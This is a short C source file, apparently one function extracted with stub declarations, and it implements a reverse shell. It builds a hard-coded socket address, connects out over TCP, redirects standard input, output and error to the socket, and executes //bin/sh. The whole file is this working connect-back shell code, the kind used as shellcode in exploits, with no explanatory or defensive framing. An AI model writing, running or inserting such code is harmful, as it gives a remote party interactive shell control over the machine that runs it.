
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ connect (int,char*,int) ;
 int dup2 (int,int) ;
 int execve (char*,char**,int *) ;
 int exit () ;
 int socket (int,int,int) ;

int
c_code()
{
        char *argv[2];
        char *sockaddr = "\x02\x00"
                         "\xef\xb0"
                         "\x00\x00\x00\x00"
                         "\x00\x00\x00\x00"
                         "\x00\x00\x00\x00";

        int sock;

        sock = socket(2, 1, 6);
        if (connect(sock, sockaddr, 16) < 0) exit();

        dup2(sock, 0);
        dup2(sock, 1);
        dup2(sock, 2);

        argv[0] = "//bin/sh";
        argv[1] = ((void*)0);

        execve(argv[0], &argv[0], ((void*)0));
        exit();
}
